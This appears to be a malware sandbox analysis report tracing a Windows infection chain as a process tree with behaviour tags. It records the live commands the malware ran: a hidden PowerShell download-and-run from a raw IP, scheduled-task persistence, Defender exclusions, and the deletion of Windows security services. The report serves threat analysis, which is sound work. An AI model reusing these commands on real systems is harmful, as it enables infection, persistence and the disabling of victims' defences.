PID 1580 wrote to memory of 4304	1580	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE	102
PID 4304 wrote to memory of 2536	4304	rapes.exe	107
PID 4304 wrote to memory of 2536	4304	rapes.exe	107
PID 4304 wrote to memory of 2536	4304	rapes.exe	107
PID 2536 wrote to memory of 1168	2536	zx4PJh6.exe	108
PID 2536 wrote to memory of 1168	2536	zx4PJh6.exe	108
PID 2536 wrote to memory of 1168	2536	zx4PJh6.exe	108
PID 1168 wrote to memory of 1780	1168	CMD.exe	112
PID 1168 wrote to memory of 1780	1168	CMD.exe	112
PID 1168 wrote to memory of 1780	1168	CMD.exe	112
PID 1168 wrote to memory of 3064	1168	CMD.exe	113
PID 1168 wrote to memory of 3064	1168	CMD.exe	113
PID 1168 wrote to memory of 3064	1168	CMD.exe	113
PID 1168 wrote to memory of 1656	1168	CMD.exe	114
PID 1168 wrote to memory of 1656	1168	CMD.exe	114
PID 1168 wrote to memory of 1656	1168	CMD.exe	114
PID 1168 wrote to memory of 5360	1168	CMD.exe	115
PID 1168 wrote to memory of 5360	1168	CMD.exe	115
PID 1168 wrote to memory of 5360	1168	CMD.exe	115
PID 1168 wrote to memory of 1488	1168	CMD.exe	116
PID 1168 wrote to memory of 1488	1168	CMD.exe	116
PID 1168 wrote to memory of 1488	1168	CMD.exe	116
PID 1168 wrote to memory of 3100	1168	CMD.exe	117
PID 1168 wrote to memory of 3100	1168	CMD.exe	117
PID 1168 wrote to memory of 3100	1168	CMD.exe	117
PID 1168 wrote to memory of 1200	1168	CMD.exe	118
PID 1168 wrote to memory of 1200	1168	CMD.exe	118
PID 1168 wrote to memory of 1200	1168	CMD.exe	118
PID 1168 wrote to memory of 5704	1168	CMD.exe	119
PID 1168 wrote to memory of 5704	1168	CMD.exe	119
PID 1168 wrote to memory of 5704	1168	CMD.exe	119
PID 1168 wrote to memory of 3716	1168	CMD.exe	120
PID 1168 wrote to memory of 3716	1168	CMD.exe	120
PID 1168 wrote to memory of 3716	1168	CMD.exe	120
PID 1168 wrote to memory of 1836	1168	CMD.exe	121
PID 1168 wrote to memory of 1836	1168	CMD.exe	121
PID 1168 wrote to memory of 1836	1168	CMD.exe	121
PID 1168 wrote to memory of 5852	1168	CMD.exe	122
PID 1168 wrote to memory of 5852	1168	CMD.exe	122
PID 1168 wrote to memory of 5852	1168	CMD.exe	122
PID 4304 wrote to memory of 6024	4304	rapes.exe	124
PID 4304 wrote to memory of 6024	4304	rapes.exe	124
PID 4304 wrote to memory of 6024	4304	rapes.exe	124
PID 4304 wrote to memory of 824	4304	rapes.exe	126
PID 4304 wrote to memory of 824	4304	rapes.exe	126
PID 824 wrote to memory of 1136	824	OkH8IPF.exe	128
PID 824 wrote to memory of 1136	824	OkH8IPF.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2580
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1456

C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
"C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:6000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn EmIJHmaHeti /tr "mshta C:\Users\Admin\AppData\Local\Temp\fxr22cHRS.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:6024
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn EmIJHmaHeti /tr "mshta C:\Users\Admin\AppData\Local\Temp\fxr22cHRS.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3744
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\fxr22cHRS.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5096
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4584
  - - C:\Users\Admin\AppData\Local\Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
      "C:\Users\Admin\AppData\Local\Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1580
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4304
      - C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2536
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1168
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1780
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3064
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1656
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5360
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 440824
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1488
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Architecture.wmv
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3100
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Offensive" Inter
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1200
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5704
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3716
        
        C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
        
        Organizations.com h
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1836
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 912
        9⤵
        Program crash
        
        PID:3592
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5852
      - C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:6024
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:380
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff97b8edcf8,0x7ff97b8edd04,0x7ff97b8edd10
        8⤵
        
        PID:5208
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1988,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1984 /prefetch:2
        8⤵
        
        PID:5020
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2232,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2236 /prefetch:3
        8⤵
        
        PID:1564
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2400,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2536 /prefetch:8
        8⤵
        
        PID:3888
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3228,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3240 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3300 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:640
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4272 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:4884
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4552 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4804,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4812 /prefetch:8
        8⤵
        
        PID:1140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4716,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4944 /prefetch:8
        8⤵
        
        PID:2392
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5276,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5292 /prefetch:8
        8⤵
        
        PID:5212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5480,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5168 /prefetch:8
        8⤵
        
        PID:232
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:13012
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x260,0x7ff97a4df208,0x7ff97a4df214,0x7ff97a4df220
        8⤵
        
        PID:13692
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1928,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=1924 /prefetch:2
        8⤵
        
        PID:13984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2224,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
        8⤵
        
        PID:13996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1936,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:8
        8⤵
        
        PID:14200
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3580,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=3664 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6412
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3576,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6420
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\d2dbi" & exit
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10728
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:10884
      - C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:824
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:1136
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4624
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5724
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4584
      - C:\Users\Admin\AppData\Local\Temp\10297860101\y0u3d_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10297860101\y0u3d_003.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:672
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4728
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:804
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:2040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6840
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\{99e2948d-c006-4262-bf92-4d4b77e0d141}\3ff3734d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{99e2948d-c006-4262-bf92-4d4b77e0d141}\3ff3734d.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:11192
        
        C:\Users\Admin\AppData\Local\Temp\{05af628d-7e82-459c-857b-141ba889bda8}\d91c7611.exe
        
        C:/Users/Admin/AppData/Local/Temp/{05af628d-7e82-459c-857b-141ba889bda8}/\d91c7611.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Checks for any installed AV software in registry
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:12132
      - C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4976
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:2080
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4688
      - C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7824
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7968
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21DB.tmp\21DC.tmp\21DD.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        8⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3356
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2277.tmp\2278.tmp\2279.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:2844
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:8376
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:4764
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:8428
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:8460
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:8504
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4688
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4904
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:8596
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:4216
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:8660
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:4768
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:8712
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:8748
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:8784
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:8820
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:8852
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:1176
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:8944
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:8984
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:9040
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:9084
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
